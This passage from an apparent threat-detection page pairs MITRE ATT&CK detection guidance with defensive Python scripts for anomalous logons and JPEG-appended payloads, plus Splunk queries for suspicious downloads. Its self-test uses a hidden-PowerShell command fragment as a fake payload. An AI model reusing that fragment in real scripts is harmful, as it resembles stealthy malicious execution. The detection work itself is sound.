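# bob's two sessions are sequential on one host; carol logs in over RDP near midnight.
SAMPLE = parse([
    ("alice", "WS01", "10.0.0.5", 2, "2025-01-14T09:02:00", "2025-01-14T17:30:00"),
    ("alice", "WS07", "10.0.9.9", 10, "2025-01-14T11:15:00", "2025-01-14T11:40:00"),
    ("bob", "WS02", "10.0.0.6", 2, "2025-01-14T08:30:00", "2025-01-14T12:00:00"),
    ("bob", "WS02", "10.0.0.6", 2, "2025-01-14T13:00:00", "2025-01-14T17:00:00"),
    ("svc_backup", "SRV01", "10.0.0.20", 3, "2025-01-14T02:00:00", "2025-01-14T02:05:00"),
    ("carol", "WS03", "203.0.113.7", 10, "2025-01-14T23:45:00", "2025-01-15T00:30:00"),
])

if __name__ == "__main__":
    print("concurrent:", concurrent_hosts(SAMPLE))
    print("off-hours:", [(s["user"], s["host"], s["start"].isoformat()) for s in off_hours(SAMPLE)])
```

The network logon (type 3) for svc_backup is ignored by the concurrency check on purpose: service accounts legitimately hold many simultaneous network sessions, and including them would drown the interactive overlaps the guidance is after; it still appears in the off-hours list, which a scheduled-backup allow list would then suppress.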


T1027 - Obfuscated Files or Information

ID | Data Source | Data Component
DS0015 | Application Log | Application Log Content
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.

DS0017 | Command | Command Execution
Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., ^).

Also monitor command-lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding.

DS0022 | File | File Creation
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).

DS0022 | File | File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

File-based signatures may be capable of detecting code obfuscation depending on the methods used.[185][186][187]

DS0011 | Module | Module Load
Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.[186]

DS0009 | Process | OS API Execution
Monitor and analyze calls to functions such as GetProcAddress() that are associated with malicious code obfuscation.[185]

DS0009 | Process | Process Creation
Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

DS0012 | Script | Script Execution
Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.

DS0024 | Windows Registry | Windows Registry Key Creation
Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.

DS0005 | WMI | WMI Creation
Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads.
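The campaign summary says the second stage is hidden inside JPG files, and the File Metadata guidance above points at the file's headers and content as the place to look. The page does not state how the payload is embedded, so the following added example (written for this page, not code from the original or from the campaign) checks the one structural case that can be verified without decoding the image: data appended after the JPEG end-of-image marker, which a viewer ignores and a loader can read back. It walks the segment table, scans the entropy-coded data correctly (0xFF is byte-stuffed or a restart marker there), and reports anything after EOI together with its entropy and whether it starts with a PE header. A payload hidden in pixel data (LSB steganography) would not be caught by this check. The test image is constructed (structurally valid, not viewable), and the 64-byte and 7.0 bits/byte thresholds are assumptions.

```python
import math
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, TEM and RST0-RST7.
STANDALONE = {0xD8, 0x01} | set(range(0xD0, 0xD8))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: around 4-5 for text or script, close to 8.0 for packed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def jpeg_trailing_data(blob: bytes) -> bytes:
    """Return the bytes after the image's EOI marker (b'' if none, or if the file is truncated).

    Walks the length-prefixed segments up to SOS, then scans the entropy-coded data, where 0xFF
    is either byte-stuffed (FF 00) or a restart marker (FF D0-D7), until EOI (FF D9).
    """
    if blob[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(blob):
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = blob[pos + 1]
        if marker in STANDALONE:
            pos += 2
            continue
        seg_len = struct.unpack(">H", blob[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == SOS:
            break  # entropy-coded data starts here and has no length field
    else:
        return b""
    while True:
        idx = blob.find(b"\xff", pos)
        if idx < 0 or idx + 1 >= len(blob):
            return b""
        if blob[idx + 1] == EOI:
            return blob[idx + 2:]
        pos = idx + 1  # stuffed byte, RSTn, or FF fill byte: keep scanning


def triage_jpeg(blob: bytes, min_trailing: int = 64) -> dict:
    """Flag appended payloads: anything substantial after EOI, a PE header, or high entropy."""
    trailing = jpeg_trailing_data(blob)
    findings = []
    if len(trailing) >= min_trailing:
        findings.append(f"{len(trailing)} bytes after EOI")
        if trailing[:2] == b"MZ":
            findings.append("appended data starts with a PE 'MZ' header")
        ent = shannon_entropy(trailing)
        if ent > 7.0:
            findings.append(f"appended data entropy {ent:.2f} bits/byte (packed or encrypted)")
        elif trailing.isascii():
            findings.append("appended data is plain ASCII (possible script or base64)")
    return {"trailing_bytes": len(trailing), "findings": findings}


def fake_jpeg(appendix: bytes = b"") -> bytes:
    """Constructed test image: APP0 + SOS header + a short scan containing a stuffed FF 00,
    an RST0 marker and an FF fill byte before EOI, followed by the optional appendix."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\xff\xff\xd9"
    return b"\xff\xd8" + app0 + sos + scan + appendix


if __name__ == "__main__":
    print(triage_jpeg(fake_jpeg()))
    print(triage_jpeg(fake_jpeg(b"MZ\x90\x00" + bytes(range(256)) * 2)))
    print(triage_jpeg(fake_jpeg(b"powershell -nop -w hidden " * 8)))
```

Run it over the JPGs fetched by the hosts in question (proxy logs give the URLs); a plain-ASCII or high-entropy tail on an image that otherwise renders is the artifact to pull for the next stage of analysis.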


T1102.002 - Bidirectional Communication

ID | Data Source | Data Component
DS0029 | Network Traffic | Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.

DS0029 | Network Traffic | Network Traffic Content
Monitor and analyze traffic patterns and perform packet inspection for protocols that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlating with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., files that do not normally initiate connections for the respective protocol(s)).

DS0029 | Network Traffic | Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1001.003 - Protocol Impersonation

ID | Data Source | Data Component
DS0029 | Network Traffic | Network Traffic Content
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[23]


T1204.001 - Malicious Link

ID | Data Source | Data Component
DS0022 | File | File Creation
Monitor for files created on a system after a user clicks on a malicious link. Look for common download paths and suspicious files with executable extensions.

Analytic 1 - Files downloaded from links and then executed

sourcetype=Sysmon EventCode=11 TargetFilename IN ("*\Downloads\*", "*\Temp\*")
| stats count by TargetFilename, User
| where like(TargetFilename, "%.exe") OR like(TargetFilename, "%.zip") OR like(TargetFilename, "%.js") OR like(TargetFilename, "%.docm")

Sysmon Event ID 11 records the created path in TargetFilename; the path filter needs wildcards, since an exact match on "/Downloads/" never fires.

DS0029 | Network Traffic | Network Connection Creation
Monitor for network connections to suspicious or external sites shortly after a user clicks on a link, especially if the URL is linked to phishing or malicious activities.

Analytic 1 - Web-based network connections to suspicious destinations

sourcetype=network_connection
| search process_name IN ("chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe") OR src_ip IN ("")

The empty list is a placeholder to be filled with the destinations or sources of interest; as written, the search returns every browser connection.

DS0029 | Network Traffic | Network Traffic Content
Inspect the content of the network traffic to look for signs of suspicious web traffic, such as phishing links or abnormal HTTP GET/POST requests.

Analytic 1 - Suspicious network traffic content

sourcetype=network_traffic_content
| search http_method="GET" OR http_method="POST"
| stats count by url domain http_method
| where domain NOT IN ("")

The empty list is again a placeholder for an allow list of known-good domains.

Observed Countries (10)

Country code (observation count):

BD (741)
CN (497)
DE (897)
DO (561)
NP (122)
PE (545)
PH (98)
RS (282)
TN (38)
US (947)